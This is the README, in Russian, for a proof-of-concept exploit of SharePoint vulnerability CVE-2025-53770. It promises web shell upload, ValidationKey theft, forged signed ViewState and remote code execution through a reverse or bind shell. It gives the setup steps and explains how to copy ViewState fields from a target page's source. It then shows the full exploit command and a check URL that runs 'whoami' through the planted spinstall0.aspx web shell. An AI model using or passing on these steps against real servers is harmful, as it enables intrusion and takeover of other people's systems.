
Эксплойт PoC для CVE-2025-53770, обеспечивающий загрузку веб-шелла в SharePoint, извлечение ValidationKey, генерацию подписанного ViewState и удаленное выполнение кода через обратный или прямой шелл.
Этот пакет позволяет:
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
Загрузите веб-шелл
Со страницы SharePoint вы можете получить доступ к исходному коду страницы. Просто перейдите на вкладку просмотра исходного кода и, если там доступно, вы получите следующее, что можно скопировать:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (любой текущий __VIEWSTATE для контекста)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
Это загружает spinstall0.aspx. Проверка: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami